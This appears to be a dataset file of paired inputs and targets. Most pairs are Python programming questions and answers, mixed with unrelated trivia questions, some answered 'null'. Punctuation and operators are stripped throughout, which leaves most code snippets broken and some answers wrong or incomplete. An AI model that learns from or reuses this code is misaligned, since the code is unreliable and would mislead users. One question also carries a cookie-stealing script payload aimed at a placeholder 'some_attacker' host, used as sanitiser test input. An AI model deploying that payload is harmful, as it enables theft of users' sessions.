input_text
stringlengths
1
40.1k
target_text
stringlengths
1
29.4k
Accessing nested YAML mappings with jinja2 I have recently started using YAML and jinja2 I am having trouble understanding why I need to reference the entire structure of my YAML mapping in the jinja2 template I have the following YAML file ````--- PROVIDERS: PROV1: int: ge-0/1/1 ipv4: 10 0 1 1/30 PROV2: int: ge-0/1/2 ipv4: 10 0 1 2/30 ```` and this is my jinja2 template ````{%- for provider in PROVIDERS %} {{ provider }} {{ PROVIDERS[provider] int }} <-- why not provider int {{ PROVIDERS[provider] ipv4 }} <-- why not provider ipv4 {%- endfor %} ```` Parsing with pyyaml gives me the (expected) output ````PROV2 ge-0/1/2 10 0 1 2/30 PROV1 ge-0/1/1 10 0 1 1/30 ```` However why must I use `PROVIDERS[provider] int`? `provider int` does not work Additionally I was wondering if I could make this a list of mappings instead of a nested mapping: ````--- PROVIDERS: - PROV1: int: ge-0/1/1 ipv4: 10 0 1 1/30 - PROV2: int: ge-0/1/2 ipv4: 10 0 1 2/30 ```` I have tried to do so but the jinja2 template no longer produced the desired output
There are two things to consider here: - What Python data structure is constructed from your YAML document? - How can your template reference the elements of that data structure? Answering point 1 is easy: ````&gt;&gt;&gt; import yaml &gt;&gt;&gt; from pprint import pprint &gt;&gt;&gt; p1 = yaml load(""" --- PROVIDERS: PROV1: int: ge-0/1/1 ipv4: 10 0 1 1/30 PROV2: int: ge-0/1/2 ipv4: 10 0 1 2/30 """) &gt;&gt;&gt; pprint(p1) {'PROVIDERS': {'PROV1': {'int': 'ge-0/1/1' 'ipv4': '10 0 1 1/30'} 'PROV2': {'int': 'ge-0/1/2' 'ipv4': '10 0 1 2/30'}}} ```` You have a dictionary with a single item whose key is `'PROVIDERS'` and whose value is a dictionary with the keys `'PROV1'` and `'PROV2'` each of whose values is a further dictionary That is a more deeply nested structure than you need (more on which later) but now that we can see your data structure we can work out what is going on with your template This line: ````{%- for provider in PROVIDERS %} ```` iterates over the <strong>keys</strong> of `PROVIDERS` (which given your output is obviously the second-level nested dictionary which is the value for the key `'PROVIDERS'` in your top-level dictionary) Since what you are iterating over are the keys you then need to use those keys to get at the associated values: ````{{ PROVIDERS[provider] int }} {{ PROVIDERS[provider] ipv4 }} ```` A more straightforward YAML document for your purposes would be this: ````--- - id: PROV1 int: ge-0/1/1 ipv4: 10 0 1 1/30 - id: PROV2 int: ge-0/1/2 ipv4: 10 0 1 2/30 ```` Note that we have ditched the redundant single-item mapping and replaced the second-level mapping of mappings with a list of mappings Again we can check that: ````&gt;&gt;&gt; p2 = yaml load(""" --- - id: PROV1 int: ge-0/1/1 ipv4: 10 0 1 1/30 - id: PROV2 int: ge-0/1/2 ipv4: 10 0 1 2/30 """) &gt;&gt;&gt; pprint(p2) [{'int': 'ge-0/1/1' 'ipv4': '10 0 1 1/30' 'id': 'PROV1'} {'int': 'ge-0/1/2' 'ipv4': '10 0 1 2/30' 'id': 'PROV2'}] ```` Here is how your template could use this data structure: ````{%- for provider in PROVIDERS %} {{ provider id }} {{ provider int }} {{ provider ipv4 }} {%- endfor %} ```` Obviously you will need to modify the code which supplies `PROVIDERS` to the template since it is now the top-level list represented by the entire YAML document rather than a dictionary nested inside it
blobkey from blobstore google apps engine python How do you return the blob key from a blob store? and subsequently return the image URL? Example code: ````class Next(webapp RequestHandler): def get(self): userTable_name=self request get('userTable_name') data = db GqlQuery("SELECT * " "FROM userTable " "WHERE ANCESTOR IS :1 " "ORDER BY date DESC LIMIT 10" userTable_key(userTable_name)) self response headers['Content-Type'] = 'text/plain' for user in data: blobURL = get_serving_url(user imageblob key() size=None crop=False) self response out write(blobURL) ```` I am using a GqlQuery to return a set of Blobs (i e user imageblob) and for each blob i need to determine the BlobKey From what I can tell "user imageblob key()" does not return the blobkey ?
Worked it out! As it turns out I was confusing "adding an image to the datastore as a blob" vs vs adding an image to the blobstore <blockquote> a BlobReferenceProperty references an object uploaded and stored in the blobstore while a BlobProperty stores blob data directly in the datastore see: <a href="http://stackoverflow com/questions/3864045/how-to-use-get-serving-url-in-appengine">How to use get_serving_url in appengine?</a> </blockquote> Hence `get_serving_url()` and `user imageblob key()` were incorrectly pointing to the datastore as opposed to the blobstore For examples of adding images to the blobstore see: <a href="http://code google com/appengine/docs/python/blobstore/overview html" rel="nofollow">http://code google com/appengine/docs/python/blobstore/overview html</a>
Import of csv file from linux to windows MYSQl I need a she will script that must import latest " csv" file into mysql My case is--->i need to import the latest " csv" file from linux to windows mysql i e my " csv" files will be stored in a path of linux PC and import need to be done in windows I would appreciate the prompt response
she will script ok: ````step 1: sort the csv file by reverse date ls --time-style=full-iso -l | grep -E "* csv" | sort -k5 -k6 -r step 2: the first file is the latest file step 3: there should have some tool to import csv file to mysql ```` windows or linux is not the problem that is why you can also access window's mysql from linux just connect the ip:port address then do anything you want
Reading CSV files in Pandas and/or Tableau With Diefferent Row Sizes I have a csv file which I want to read with Pandas library in Python In this table when we encounter a new item (e g items Nr 1393 or 1654 in the example below) we first have a 4 column row metadata and after that several 100 column rows as real data associated to that item Then it happens again for the next item and so on The table is like this: ````1 1393 0 0 1 1393 1 22 55 63 1 1393 5 32 43 163 2 1654 0 0 2 1654 8 95 96 142 2 1654 21 31 364 9 ```` So the problems are: - Some rows have different sizes than others - We do not have headers and can not create it as the first row has 4 entries and second one 100 entries - My CSV file is huge (about 10G)! Any suggestion which helps me to organize my data in Pandas or any other Python library is highly appreciated PS: BY THE WAY anybody knows how to manage it in Tableau?
When data does not fit an existing `pandas` reader you can create your own generator and populate the dataframe with `from_records` Lacking details on how these various items should be related I wrote an example that just adds the latest metadata to the front of each row ````import pandas as pd def my_data_generator(fp): metadata = [] for line in fp: data = line strip() split(' ') if len(data) == 4: metadata = data elif not metadata: raise ValueError("csv file did not start with metadata") elif data: yield metadata data df = pd DataFrame from_records(my_data_generator(open('somefile csv'))) print(df) ````
How to write specific length lines of a file? I have this sequences (over 9000) like this: ````&gt;TsM_000224500 MTTKWPQTTVTVATLSWGMLRLSMPKVQTTYKVTQSRGPLLAPGICDSWSRCLVLRVYVDRRRPGGDGSLGRVAVTVVETGCFGSAASFSMWVFGLAFVVTIEEQLL &gt;TsM_000534500 MHSHIVTVFVALLLTTAVVYAHIGMHGEGCTTLQCQRHAFMMKEREKLNEMQLELMEMLMDIQTMNEQEAYYAGLHGAGMQQPLPMPIQ &gt;TsM_000355900 MESGEENEYPMSCNIEEEEDIKFEPENGKVAEHESGEKKESIFVKHDDAKWVGIGFAIGTAVAPAVLSGISSAAVQGIRQPIQAGRNNGETTEDLENLINSVEDDL ```` The lines containing the ">" are the ID's and the lines with the letters are the amino acid (aa) sequences I need to delete (or move to another files) the sequences below 40 aa and over 4000 aa Then the resulting file should contain only the sequences within this range (>= 40 aa and <= 4K aa) I have tried writing the following script: ````def read_seq(file_name): with open(file_name) as file: return file read() split('\n')[0:] ts = read_seq("/home/tiago/t_solium/ts_phtm0less txt") tsf = open("/home/tiago/t_solium/ts_secp-404k" 'w') for x in range(len(ts)): if ([x][0:1] != '&gt;'): if (len([x]) &gt; 40 or len([x]) < 4000): tsf write('%s\n'%(x)) tsf close() print "OK!" ```` I have done some modifications but all I am getting are empty files or with all the 9000 sequences
In your for loop `x` is an iterating integer due to using `range()` (i e `0 1 2 3 4 `) Try this instead: `for x in ts:` This will give you each element in `ts` as `x` Also you do not need the brackets around `x`; Python can iterate over the characters in strings on its own When you put brackets around a string you put it into a list and thus if you tried for example to get the second character in `x`: `[x][1]` Python will try to get the second element in the list that you put `x` in and will run into problems EDIT: To include IDs try this: NOTE: I also changed `if (len(x) &gt; 40 or len(x) < 4000)` to `if (len(x) &gt; 40 and len(x) < 4000)` -- using `and` instead of `or` will give you the result you are looking for ````for i x in enumerate(ts): #NEW: enumerate ts to get the index of every iteration (stored as i) if (x[0] != '&gt;'): if (len(x) &gt; 40 and len(x) < 4000): tsf write('%s\n'%(ts[i-1])) #NEW: write the ID number found on preceding line tsf write('%s\n'%(x)) ````
How to extract url GET parameter from <a> tag from the full html text So I have an html page It is full of various tags most of them have sessionid GET parameter in their href attribute Example: ```` <a href="struct_view_distrib asp?sessionid=11692390"&gt; <a href="SHOW_PARENT asp?sessionid=11692390"&gt; <a href="nakl_view asp?sessionid=11692390"&gt; <a href="move_sum_to_7300001 asp?sessionid=11692390&amp;mode_id=0"&gt; ```` So as you see sessionid is the same i just need to get it is value into variable no matter from which one: x=11692390 I am newbie in regex but google was not helpful Thanks a lot!
Parse your HTML with a DOM parsing library and use `getElementsByTagName('a')` to grab anchors iterate through them and use `getAttribute('href')` and then extract the string Then you can use regex or split on `?` to match/retrieve the session id
Why is Flask application not creating any logs when hosted by Gunicorn? I am trying to add logging to a web application which uses Flask When hosted using the built-in server (i e `python3 server py`) logging works When hosted using Gunicorn the log file is not created The simplest code which reproduces the problem is this one: ````#!/usr/bin/env python import logging from flask import Flask flaskApp = Flask(__name__) @flaskApp route('/') def index(): flaskApp logger info('Log message') print('Direct output') return 'Hello World\n' if __name__ == "__main__": logHandler = logging FileHandler('/var/log/demo/app log') logHandler setLevel(logging INFO) flaskApp logger addHandler(logHandler) flaskApp logger setLevel(logging INFO) flaskApp run() ```` The application is called using: ````gunicorn server:flaskApp -b :80 -w 4 --access-gfile /var/log/demo/access log --error-logfile /var/log/demo/error log ```` When doing a request to the home page of the site the following happens: - I receive the expected HTTP 200 "Hello World\n" in response - There is a trace of the request in `/var/log/demo/access log` - `/var/log/demo/error log` stays the same (there are just the boot events) - There is the "Direct output" line in the terminal - There is no '/var/log/demo/app log' If I create the file prior to launching the application the file is not modified Note that: - The directory `/var/log/demo` can be accessed (read write execute) by everyone so this is not the permissions issue - If I add `StreamHandler` as a second handler there is still no trace of the "Log message" message neither in the terminal nor in Gunicorn log files - Gunicorn is installed using `pip3 install gunicorn` so there should not be any mismatch with Python versions What is happening?
When you use `python3 server py` you are running the server3 py script When you use `gunicorn server:flaskApp ` you are running the gunicorn startup script which then <strong>imports</strong> the module `server` and looks for the variable `flaskApp` in that module Since `server py` is being imported the `__name__` var will contain `"server"` not `"__main__"` and therefore you log handler setup code is not being run You could simply move the log handler setup code outside of the `if __name__ == "__main__":` stanza But ensure that you keep `flaskApp run()` in there since you do <them>not</them> want that to be run when gunicorn imports `server` More about <a href="http://stackoverflow com/questions/419163/what-does-if-name-main-do">what does `if __name__ == “__main__”:` do?</a>
Getting Started with SWIG and Visual Studio I am trying to create my first SWIG python DLL with Visual Studio 2010 using an example I downloaded from swig org I am running Windows professional 64-bit I downloaded swigwin-2 0 7 and unzipped it I have followed the instructions <a href="http://stackoverflow com/questions/5969173/how-to-swig-in-vs2010">here</a> and <a href="http://stackoverflow com/questions/11693047/how-to-create-a-dll-with-swig-from-visual-studio-2010">here</a> and in both cases the wrap file gets built but the project build fails The linker complains about 56 unresolved external symbols all with names something like _<them>imp</them>_PyBytes_AsStringAndSize or _<them>imp</them>_PyExc_RuntimeError I have tried this using my python 2 7 installation as well as my python 3 2 installation with similar results Do I have to build swig from the source for my platform? I have spent the last 6 hours or so on this and I am nonplussed
Following the instructions <a href="http://stackoverflow com/questions/11693047/how-to-create-a-dll-with-swig-from-visual-studio-2010">here</a> using the `simple` Python example from SWIG Windows 7 64-bit and Python 2 7 32-bit I did not see the OP's specific errors I saw: ````1&gt;example_wrap obj : error LNK2019: unresolved external symbol "int __cdecl gcd(int int)" (?gcd@@YAHHH@Z) referenced in function __wrap_gcd 1&gt;example_wrap obj : error LNK2001: unresolved external symbol "double Foo" (?Foo@@3NA) ```` Two changes had to be made due to the `simple` example being C source instead of C++: - Do not use the `-c++` switch on the `swig` command line (step 13 of the instructions) - The generated file is now `example_wrap c` not `example_wrap cxx` (referred to in steps 14 and 19 of the instructions) Alternatively just rename `example c` to `example cpp` in this case before following the instructions and they should work as is
How does one use the VSCode debugger to debug a Gunicorn worker process? I have a GUnicorn/Falcon web service written in Python 3 4 on Ubuntu 14 04 I would like to use the VSCode debugger to debug this service I currently start the process with the command ````/usr/local/bin/gunicorn --config /webapps/connects/routerservice_config py routerservice:api ```` which starts routerservice py using the config file routerservice_config py I have workers set to 1 in the config to keep it simple I have installed the Python extension to VSCode so I have the Python debugging tools So how do I attach to the GUnicorn worker process or have VSCode run the startup command and auto attach Thanks Greg
I am the author of the extension You could try the following: <a href="https://github com/DonJayamanne/pythonVSCode/wiki/Debugging:-Remote-Debuging" rel="nofollow">https://github com/DonJayamanne/pythonVSCode/wiki/Debugging:-Remote-Debuging</a> - Add the following code into your routerservice_config py (or similar python startup file) ` import ptvsd ptvsd enable_attach("my_secret" address = ('0 0 0 0' 3000)) ` - Start the above application - Go into VS Code and then attach the debugger FYI: - This requires you to include the ptvsd package and configure it in your application - The plan is to add the feature to attach the debugger to any python process in the future (hopefully near future)
In which year did the last permanent settler arrive at the islands?
null
Ashkenazi families that left Northern Italy went where?
Central and eventually Eastern Europe
Validation loop error I am trying to validate my python script: ````def DOBSearch(): loop = True while loop == True: try: DOBsrch = int(input("Please enter the birth month in a two digit format e g 02: ")) for row in BkRdr: DOB = row[6] day month year = DOB split("/") if DOBsrch == int(month): print("W") surname = row[0] firstname = row[1] print(firstname " " surname) addrsBk close loop = False else: print("1 That was an invalid choice please try again ") except ValueError: print("That was an invalid choice please try again ") ```` However when I try to test the script I find there is a bug/error as I get the following outputs: ````&gt;&gt;&gt; DOBSearch() Please enter the birth month in a two digit format e g 02: 2345 1 That was an invalid choice please try again 1 That was an invalid choice please try again 1 That was an invalid choice please try again 1 That was an invalid choice please try again 1 That was an invalid choice please try again 1 That was an invalid choice please try again Please enter the birth month in a two digit format e g 02: 23456 Please enter the birth month in a two digit format e g 02: 4321 Please enter the birth month in a two digit format e g 02: 2345 Please enter the birth month in a two digit format e g 02: yrsdhctg That was an invalid choice please try again Please enter the birth month in a two digit format e g 02: 02 Please enter the birth month in a two digit format e g 02: ```` here is the CSV file: ````Jackson Samantha 2 Heather Row Basingstoke RG21 3SD 01256 135434 23/04/1973 sam jackson@hotmail com Vickers Jonathan 18 Saville Gardens Reading RG3 5FH 01196 678254 04/02/1965 the_man@btinternet com Morris Sally The Old Lodge Hook RG23 5RD 01256 728443 19/02/1975 smorris@fgh co uk Cobbly Harry 345 The High Street Guildford GU2 4KJ 01458 288763 30/03/1960 harry cobbly@somewhere org uk Khan Jasmine 36 Hever Avenue Edenbridge TN34 4FG 01569 276524 28/02/1980 jas khan@hotmail com Vickers Harriet 45 Sage Gardens Brighton BN3 2FG 01675 662554 04/04/1968 harriet vickers@btinternet com ````
I think there are a two errors in your code The first is that you are printing your first error message repeatedly This is because the `print` line is inside of the `for` loop that checks against each row from your CSV file Each row that does not match produces the error message To fix that you should probably move the `print` statement up a level to be called after the `for` loop ends The second issue is that `BkRdr` which you loop on appears to be an iterator not a sequence that you can repeatedly iterate This is why every numerical entry after the first fails silently The `for` loop does not do anything at all in those cases! To fix this second issue you probably need to change other code you have not shown so that your CSV file gets read into a list rather than only an iterator (Or alternatively you could rewind the file or close and reopen it )
Does setup py's extras_require keyword support comma-separated extras? Setuptools let us you list requirements for optional features ````# mypackage 'extras_require' : { 'PDF' : ['reportlab'] 'DOCX' : ['docxlib'] } ```` and another package can specify `'requires' : [ 'mypackage[PDF]' ]` If another package wants to require more than one extra from the first package can it ask for `'requires' : [ 'mypackage[PDF DOCX]' ]`?
from: <a href="http://peak telecommunity com/DevCenter/setuptools#declaring-dependencies" rel="nofollow">http://peak telecommunity com/DevCenter/setuptools#declaring-dependencies</a> setuptools and pkg_resources use a common syntax for specifying a project's required dependencies This syntax consists of a project's PyPI name optionally followed by a comma-separated list of "extras" in square brackets optionally followed by a comma-separated list of version specifiers so your answer is yes
Why is function not working? Trying to replace words in string I am trying to replace some key words in a string Here is my function: ````def clean_code(input): input replace('<script&gt;' " ") input replace('</script&gt;' " ") input replace('<a href&gt;' " ") input replace('</a&gt;' " ") input replace('&gt;' "&amp;gt;") input replace('&gt;' "&amp;lt;") return input ```` and here is my other code and the string: ````string1 = "This blog is STUPID! &gt;\n" \ "<script&gt;document location='http://some_attacker/cookie cgi?"\ " document cookie </script&gt;" print '\nstring1 cleaned of code' print '------------------------' print clean_code(string1) ```` My output is as follows and I am not sure why nothing has changed ````string1 cleaned of code ------------------------ This blog is STUPID! &gt; <script&gt;document location='http://some_attacker/cookie cgi? document cookie </script&gt; ````
Python strings are <strong>immutable</strong>: ````input = input replace('<script&gt;' " ") input = ```` See <a href="http://docs python org/library/string html#string replace">`replace` documentation</a>: <blockquote> <strong>Return a copy of string str</strong> with all occurrences of substring old replaced by new </blockquote>
urllib2 encoding issue This is my example script: ````import urllib2 re response = urllib2 urlopen('http://domain tld/file') data = response read() # Normally displays "the emoticon <3 is blah blah" pattern = re search('(the emoticon )( *)( is blah blah)' data) result = pattern group(2) # result should contain "<3" now print 'The result is ' result # prints "&amp;lt;3" because not encoded ```` As you can see I am obtaining a page and trying to get a string out of it but it is not encoded correctly as I am not sure what to add to this script o make the end result correct Could anyone point out what I am doing wrong?
try this: ````&gt;&gt;&gt; import HTMLParser &gt;&gt;&gt; h = HTMLParser HTMLParser() &gt;&gt;&gt; h unescape('wer&amp;amp;wer') you'wer&amp;wer' ````
Writing to numpy array from dictionary I have a dictionary of file header values (time number of frames year month etc) that I would like to write into a numpy array The code I have currently is as follows: ```` arr=np array([(k )+v for k v in fileheader iteritems()] dtype=["a3 a i4 i4 i4 i4 f8 i4 i4 i4 i4 i4 i4 a10 a26 a33 a235 i4 i4 i4 i4 i4 i4"]) ```` But I get an error "can only concatenate tuple (not "int") to tuple Basically the end result needs to be arrays storing the overall file header info (which is 512 bytes) and each frame's data (header and data 49408 bytes for each frame) Is there an easier way to do this? Edit: To clarify (for myself as well) I need to write in the data from each frame of the file to an array I was given matlab code as a base Here is a rough idea of the code given to me: ````data frame=zeros([512 96]) frame=uint8(fread(fid [data numbeams 512]) 'uint8')) data frame=frame ```` How do I translate the "frame" into python?
The problem seems to be that `v` is an `int` rather than a `tuple` Try: ````arr=np array([(k v) for k v in fileheader iteritems()] dtype=["a3 a i4 i4 i4 i4 f8 i4 i4 i4 i4 i4 i4 a10 a26 a33 a235 i4 i4 i4 i4 i4 i4"]) ````
How do I find missing dates in a list of sorted dates? In Python how do I find all the missing days in a sorted list of dates?
Sort the list of dates and iterate over it remembering the previous entry If the difference between the previous and current entry is more than one day you have missing days Here is one way to implement it: ````from datetime import date timedelta from itertools import tee izip def pairwise(iterable): "s > (s0 s1) (s1 s2) (s2 s3) " a b = tee(iterable) b next() return izip(a b) def missing_dates(dates): for prev curr in pairwise(sorted(dates)): i = prev while i timedelta(1) < curr: i = timedelta(1) yield i dates = [ date(2010 1 8) date(2010 1 2) date(2010 1 5) date(2010 1 1) date(2010 1 7) ] for missing in missing_dates(dates): print missing ```` Output: ````2010-01-03 2010-01-04 2010-01-06 ```` Performance is O(n*log(n)) where n is the number of days in the span when the input is unsorted As your list is already sorted it will run in O(n)
How use PyQt without GUI? I want create python server application using `PyQt4` without GUI ( signal/slots threads process and other core patterns ) How i can create this?
If you need the Qt EventLoop without a GUI you can use `QCoreApplication` instead of `QApplication`: <a href="http://pyqt sourceforge net/Docs/PyQt4/qcoreapplication html" rel="nofollow">http://pyqt sourceforge net/Docs/PyQt4/qcoreapplication html</a> From the <a href="http://pyqt sourceforge net/Docs/PyQt4/qcoreapplication html#details" rel="nofollow">docs</a>: <blockquote> The QCoreApplication class provides an event loop for console Qt applications This class is used by non-GUI applications to provide their event loop For non-GUI application that uses Qt there should be exactly one QCoreApplication object For GUI applications see QApplication QCoreApplication contains the main event loop where all events from the operating system (e g timer and network events) and other sources are processed and dispatched It also handles the application's initialization and finalization as well as system-wide and application-wide settings </blockquote>
best way to store code for later execution (python) I have some tasks stored in db for later execution For example i can fix task of sending email And by cron exec task (send it) I search for best way to store code in db for later execution For ex store it in raw string of python code and than do eval but also i must store relative imports here for example for send email i must fix string like this: s = "from django core mail import send_mail\n send_mail('subj' 'body' 'email@box ru' ['email1@box ru'] fail_silently=False)" and later eval any ideas to do it best way or mb better pattern for this kind of task?
I would not use this solution at all I would create a different handler for each task (sending a mail deleting a file etc) Storing code in this manner is hackish <strong>EDIT</strong> An example would be creating your own format for handlers For example each line one handler in this format: ````handlername;arg1;arg2;arg3;arg4 ```` Next you use python to read out the lines and parse them For example this would be a stored line: ````sendmail;nightcracker@nclabs org;subject;body ```` Which would be parsed like this: ````for line in database: handler *args = line split(";") if handler == "sendmail": recipient subject body = args[:3] # do stuff elif handler == "delfile": #etc ````
What school is Philip Hamburger disassociated with?
null
MongoAlchemy ObjectIdField resolution If I have a Model that contains an ObjectIdField to another model I would normally (django) use a `property` to create a getter and the reference would be transparent in usage Like so: ````class Image(db Document): name_full = db StringField(required=True) name_thumb = db StringField(required=False) source = db StringField(required=False) class Product(db Document): name = db StringField() description = db StringField(required=False) image_id = db ObjectIdField(required=False) def _get_image(self): try: return db query(Image) filter(mongo_id=self image_id)[0] except IndexError: return None image = property(_get_image) ```` Though in practice I get this error when trying to access it from a template: ````<img src="{{ url_for('static' filename='images/products/'+product image name_thumb) }}"&gt; UndefinedError: 'app models Product object' has no attribute 'image' ```` Am I going about this the right way?
Answering my own question here It seems that my mistake was in the function itself not the declaration of the property Once I used a `session` instead of `db` it started working I also shortened the property declaration to just use `@property` instead ````from mongoalchemy session import Session session = Session connect('flask-test') @property def image(self): try: return session query(Image) filter({"mongo_id":self image_id})[0] except IndexError: return None ````
Python: Tkinter: Break out of a button command call Is it possible in Tkinter to break up to the callback on a button I have a segment of code that if the user makes a mistake will cause an error in a specific part of it however it is within a for loop nested in another for loop and a while loop and can be either 2 or 3 functions deep (with the return of these functions being operated on) What I would like to do would be to return to the mainloop() when this error is found So the code looks a bit like: ````from Tkinter import * def func_call(val_list): y = [] for nn in range(len(val_list)): if val_list[nn] < 0: print('You entered a value that was too low ') break else: y append(val_list[nn]+5) return(y) def Button_callback(value): val_list = [value value-1 value-2 value-3] y = func_call(val_list) for nn in range(len(val_list)): print(y[nn]) root = Tk() Button(root text='Press me' command=lambda: Button_callback(1)) grid(row=0 column=0) root mainloop() ```` What this does is identifies that the value is too low and then breaks out the for loop and then returns the variable "y" to the previous function which then promptly puts out an error because it expects "y" to be the same length as "val_list" What I would like it to do is to effectively return to the button press so break out of both "func_call" and "Button_callback" with only "You entered a value that was too low " as an error message Any suggestions?
This problem does not have much to do with Tkinter it is just a normal control-flow question Typically the way you handle a situation like this where you want an inner function to stop all processing is to throw an exception since an exception will propagate up until something catches it For example: ````def func_call(val_list): if val_list[nn] < 0: raise ValueError("value too low") def Button_callback(value): try: y = func_call(val_list) except ValueError: return ````
Avoidance of unwholesome actions and use of positive actions is called what?
sīla
How to manually change a colormap in python/matplotlib I want to use the colormap `rainbow` in an image using `imshow` It works perfectly but I want to redefine the color for the value `0` Instead of violete I want to use white I want to do this only for the value zero all other values can stay with the default values in the colormap Any idea how to do this <strong>without</strong> having to edit the colormap manually?
You can also use `set_under` which I think makes more semantic sense than using `set_bad` ````my_cmap = matplotlib cm get_cmap('rainbow') my_cmap set_under('w') imshow(np arange(25) reshape(5 5) interpolation='none' cmap=my_cmap vmin= 001) ```` You can tweak the colorbar to also show the 'under' (and the symmetric 'over') color using the kwarg `extend` see <a href="http://matplotlib org/examples/api/colorbar_only html">example</a> and <a href="http://matplotlib org/api/pyplot_api html#matplotlib pyplot colorbar">docs</a> For an answer to a duplicate with more complete examples see <a href="https://stackoverflow com/questions/25432654/how-to-create-matplotlib-colormap-that-treats-one-value-specially?noredirect=1#comment39706467_25432654">How to create matplotlib colormap that treats one value specially?</a>
First Last Next ordering in exporting CSV Python I have a CSV of items and values and a representation of it would look something like this: ````foo 569 bar 9842 asdasd 98 poiqweu 7840 oiasd 4 poeri 145 sacodiw 55 aosdwr 855 9523 60 a52sd 5500 sdcw 415 0932 317 ```` I want to export to three CSVs such that they receive items from the master CSV in the order: highest lowest next highest next lowest etc CSV1 should be: ````bar 9842 oiasd 4 poiqweu 7840 sacodiw 55 ```` And so on for the other two CSVs For bonus what I <them>really</them> want to do is create three CSVs of 90 items each from a master of 270 such that each of the three are as close to the same sum of values as each other as possible I assume there is a better way than my simplistic (and highly assumptive) method How would I go about this in my python script that I am already using (which includes both CSV and pandas if the latter is any help)?
You can use the following building blocks to solve the problem (it should not be hard to take it from here): Use <a href="http://pandas pydata org/" rel="nofollow">pandas</a> to load and sort: ````import pandas as pd original = pd read_csv('test csv' names=['name' 'count']) df_highest_first = df sort(columns=['count']) df_smallest_first = df sort(columns=['count'] ascending=False) largest_1 = df_largest['count'][0:-1:2] values largest_2 = df_largest['count'][1:-2:2] values smallest_1 = df_smallest['count'][0:-1:2] values smallest_2 = df_smallest['count'][1:-2:2] values ```` and then <a href="http://stackoverflow com/questions/11125212/interleaving-lists-in-python">izip</a> to interleave elements between pairs of lists: ````result = list(chain from_iterable(izip(list_a list_b))) ````
How can I remove duplicate words in a string with Python? Following example: ````string1 = "calvin klein design dress calvin klein" ```` How can I remove the second two duplicates `"calvin"` and `"klein"`? The result should look like ````string2 = "calvin klein design dress" ```` only the second duplicates should be removed and the sequence of the words should not be changed!
You can use a set to keep track of already processed words ````words = set() result = '' for word in string1 split(): if word not in words: result = result word ' ' words add(word) print result ````
trouble sending email using python SMTP So I am having trouble finding what this error is: ````smtplib SMTPAuthenticationError: (235 'welcome') ```` I cannot find a clear answer what 235 is anywhere So I do something along the lines of the following: ````s = smtplib SMTP() s connect("smtp myserver com" 25) ```` With a reply of (220 'Welcome to the 9x SMTP Server') Then I do: ````s ehlo() ```` and get back ````(250 'p3\nAUTH LOGIN\nHELP') ```` I did this because the server does not support starttls ````smtplib SMTPException: STARTTLS extension not supported by server ```` Then I try to log in: ````&gt;&gt;&gt; s login("test@myserver com" "password") Traceback (most recent call last): File "<stdin&gt;" line 1 in <module&gt; File "C:\Program Files\Python27\lib\smtplib py" line 608 in login raise SMTPAuthenticationError(code resp) smtplib SMTPAuthenticationError: (235 'welcome') ```` I do not know what 235 means but I get a welcome string I am really confused I am 100% sure my credentials are correct
Maybe you have to perform additional settings required by your SMTP According to the <a href="https://docs python org/2/library/smtplib html#smtplib SMTP ehlo" rel="nofollow">documentation</a> since you are using `ehlo` you can perform such setup by changing `s esmtp_features` dictionary Example: ````s esmtp_features["auth"] = "LOGIN DIGEST-MD5" # changing the authentication method ````
In what year was Marshall Field and company closed?
null
Attach the same SQLAlchemy table to two models with different binds I want to add two MySQL databases into my Flask app Unfortunately these database are almost identical They have same table and column names but different data I am using SQLALCHEMY_BINDS in my `config py` ````SQLALCHEMY_BINDS = { 'old': 'mysql://[OLD_DB_HERE]' 'new': 'mysql://[NEW_DB_HERE]' } ```` And then in my `models py` ````class CallOld(db Model): __bind_key__ = 'old' __table__ = db Model metadata tables['ConferenceCall2'] class CallNew(db Model): __bind_key__ = 'new' __table__ = db Model metadata tables['ConferenceCall2'] ```` The problem is that when I call a query for both tables I get the same results For example both `CallOld query with_entities(CallOld TenantName distinct()) all()` and `CallNew query with_entities(CallNew TenantName distinct()) all()` return the same Interestingly the output is <strong>always</strong> from the second of the two model classes Apparently the second class (`CallNew` in that case) overwrites the first (`CallOld`) How do I attach the same table definition to two models with different binds?
You should use a <a href="http://docs sqlalchemy org/en/latest/orm/extensions/declarative/mixins html" rel="nofollow">mixin</a> for this: <blockquote> A common need when using <a href="http://docs sqlalchemy org/en/latest/orm/extensions/declarative/api html#module-sqlalchemy ext declarative" rel="nofollow">`declarative`</a> is to share some functionality such as a set of common columns </blockquote> The reason why the output is always from the second (new) model's bound database is that as you manually define the `__table__` for the two models Flask's declarative extensions <a href="https://github com/mitsuhiko/flask-sqlalchemy/blob/master/flask_sqlalchemy/__init__ py#L602" rel="nofollow">work their black magic</a>: ````def __init__(self name bases d): bind_key = d pop('__bind_key__' None) or getattr(self '__bind_key__' None) DeclarativeMeta __init__(self name bases d) if bind_key is not None and hasattr(self '__table__'): self __table__ info['bind_key'] = bind_key ```` As can be seen the <a href="http://docs sqlalchemy org/en/latest/core/metadata html#sqlalchemy schema Table params info" rel="nofollow">`__table__ info['bind_key']`</a> is overwritten in each declarative class that the table is passed to
What city was Harry Boardman from?
null
Multiple database help? (django) So I read over the multiple database docs at <a href="https://docs djangoproject com/en/dev/topics/db/multi-db/" rel="nofollow">https://docs djangoproject com/en/dev/topics/db/multi-db/</a> and it was decently helpful I got how to show second database in setting py and how to sync it via command prompt but what I cannot figure out is how to specify how to make a certain model get synced to/saved in a second database especially if i have not explicitly stated it Like users If I am using django's users class to create users and such how can I get that saved to the second database?
Please read the doc you provided again and carefully The <a href="https://docs djangoproject com/en/dev/topics/db/multi-db/#automatic-database-routing" rel="nofollow">Automatic databse routing</a> section of the doc answers your question exactly The routing of User DB depends on your actual usage and partition policy there is not one sentence answer There are examples inside the document for User you could read and check in your local machine
Regarding the intromission theory of light, who showed the first proof?
Ibn al-Haytham
local member referenced before assignment I get this error "local member event referenced before assignment" in the following code ````for event in event get(): if event type == QUIT: sys exit ```` I even tried added `global event` before the beginning of for loop but then I will get an error saying "event member not defined" Can anybody please help me with this ?
See this example from the pygame docs: ````import random time pygame sys from pygame locals import * for event in pygame event get(): if event type == QUIT: #event is quit terminate() ```` I am guessing the problem is that you have imported pygame event so you are getting a name conflict Change your import to just import pygame (and use the qualified reference `pygame event`) or else as suggested use a different name for your iterator variable
